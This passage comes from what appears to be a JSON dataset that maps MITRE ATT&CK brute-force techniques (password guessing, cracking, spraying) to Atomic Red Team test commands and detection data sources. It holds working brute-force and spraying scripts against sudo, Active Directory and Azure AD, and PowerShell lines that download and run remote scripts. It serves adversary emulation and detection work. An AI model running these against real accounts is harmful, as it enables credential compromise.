sleep 2; \\\n done; \\\n rm /tmp/file\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.001", + "display_name": "Brute Force: Password Guessing", + "atomic_tests": [ + { + "name": "Brute Force Credentials of single Active Directory domain users via SMB", + "auto_generated_guid": "09480053-2f98-4854-be6e-71ae5f672224", + "description": "Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user": { + "description": "Account to bruteforce", + "type": "String", + "default": "%username%" + } + }, + "executor": { + "name": "command_prompt", + "command": "echo Password1> passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\#{user}\" \"%p\" 1>NUL 2>&1 && @echo [*] #{user}:%p && @net use /delete %logonserver%\\IPC$ > NUL\n" + } + }, + { + "name": "Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)", + "auto_generated_guid": "c2969434-672b-4ec8-8df0-bbb91f40e250", + "description": "Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user": { + "description": "Account to bruteforce", + "type": "String", + "default": "$ENV:USERNAME" + }, + "passwords_path": { + "description": "List of passwords we will attempt to brute force with", + "type": "Path", + "default": "PathToAtomicsFolder\\T1110.001\\src\\passwords.txt" + }, + "domain": { + "description": "Active Directory domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "auth": { + "description": "authentication method to choose between \"NTLM\" and \"Kerberos\"", + "type": "String", + "default": "NTLM" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n" + } + }, + { + "name": "Brute Force Credentials of single Azure AD user", + "auto_generated_guid": "5a51ef57-299e-4d62-8e11-2d440df55e69", + "description": "Attempt to brute force Azure AD user via AzureAD powershell module.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg \"bruce.wayne@\"", + "type": "String", + "default": "bruce.wayne@contoso.com" + }, + "passwords": { + "description": "List of passwords we will attempt to brute force with", + "type": "String", + "default": "Password1`n1q2w3e4r`nPassword!" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n" + } + }, + { + "name": "SUDO brute force Debian", + "auto_generated_guid": "464b63e8-bf1f-422e-9e2c-2aa5080b6f9a", + "description": "Brute force the password of a local user account which is a member of the sudo'ers group on a Debian based Linux distribution. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Debian based machine.\n", + "prereq_command": "if grep -iq \"debian\\|ubuntu\\|kali\" /usr/lib/os-release; then echo \"Debian\"; else echo \"NOT Debian\"; exit 1; fi\nif grep -Rq \"pam_tally\" /etc/pam.d/*; then echo \"pam_tally configured\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo installed\"; else echo \"install sudo\"; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl installed\"; else echo \"install openssl\"; fi\n", + "get_prereq_command": "apt-get update && apt-get install -y openssl sudo\n" + } + ], + "executor": { + "elevation_required": true, + "command": "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "cleanup_command": "userdel target\n", + "name": "sh" + } + }, + { + "name": "SUDO brute force Redhat", + "auto_generated_guid": "b72958a7-53e3-4809-9ee1-58f6ecd99ade", + "description": "Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Redhat based machine.\n", + "prereq_command": "if grep -iq \"rhel\\|fedora\\|centos\" /usr/lib/os-release; then echo \"Redhat\"; else echo \"NOT Redhat\"; exit 1; fi\nif grep -Rq \"pam_faillock\" /etc/pam.d/*; then echo \"pam_faillock configured\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo installed\"; else echo \"install sudo\"; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl installed\"; else echo \"install openssl\"; fi\n", + "get_prereq_command": "yum -y update && yum install -y openssl sudo\n" + } + ], + "executor": { + "elevation_required": true, + "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "cleanup_command": "userdel target\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.002", + "command_list": [ + "cd %temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe\\..\n%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule PathToAtomicsFolder\\T1110.002\\src\\sam.txt #{input_file_passwords}", + "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} PathToAtomicsFolder\\T1110.002\\src\\password.lst" + ], + "commands": [ + { + "command": "cd %temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe\\..\n%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + }, + { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule PathToAtomicsFolder\\T1110.002\\src\\sam.txt #{input_file_passwords}", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + }, + { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} PathToAtomicsFolder\\T1110.002\\src\\password.lst", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.002", + "display_name": "Brute Force: Password Cracking", + "atomic_tests": [ + { + "name": "Password Cracking with Hashcat", + "auto_generated_guid": "6d27df5d-69d4-4c91-bc33-5983ffe91692", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hashcat_exe": { + "description": "Path to Hashcat executable", + "type": "String", + "default": "%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe" + }, + "input_file_sam": { + "description": "Path to SAM file", + "type": "String", + "default": "PathToAtomicsFolder\\T1110.002\\src\\sam.txt" + }, + "input_file_passwords": { + "description": "Path to password list", + "type": "String", + "default": "PathToAtomicsFolder\\T1110.002\\src\\password.lst" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Hashcat must exist on disk at specified location (#{hashcat_exe})", + "prereq_command": "if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://www.7-zip.org/a/7z1900.exe\" -OutFile \"$env:TEMP\\7z1900.exe\"\nStart-Process -FilePath \"$env:Temp\\7z1900.exe\" -ArgumentList \"/S /D=$env:temp\\7zi\" -NoNewWindow\nInvoke-WebRequest \"https://hashcat.net/files/hashcat-6.1.1.7z\" -OutFile \"$env:TEMP\\hashcat6.7z\"\nStart-Process cmd.exe -Args \"/c %temp%\\7z\\7z.exe x %temp%\\hashcat6.7z -aoa -o%temp%\\hashcat-unzip\" -Wait\nNew-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null\nMove-Item $env:Temp\\hashcat-unzip\\hashcat-6.1.1\\* $(cmd /c echo #{hashcat_exe}\\..) -Force -ErrorAction Ignore" + } + ], + "executor": { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "cleanup_command": "del %temp%\\hashcat6.7z >nul 2>&1\ndel %temp%\\7z1900.exe >nul 2>&1\ndel %temp%\\7z /Q /S >nul 2>&1\ndel %temp%\\hashcat-unzip /Q /S >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.003", + "command_list": [ + "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. & @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"Spring2020\" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\\IPC$ > NUL\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain $Env:USERDOMAIN -Force\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = 'P@ssw0rd!'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"P@ssw0rd!\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting P@ssw0rd! on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:P@ssw0rd! are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:P@ssw0rd! invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + null, + "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"Spring2020\" $env:Temp\\usersdpsLight.txt\n" + ], + "commands": [ + { + "command": "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. & @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"Spring2020\" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\\IPC$ > NUL\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain $Env:USERDOMAIN -Force\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object 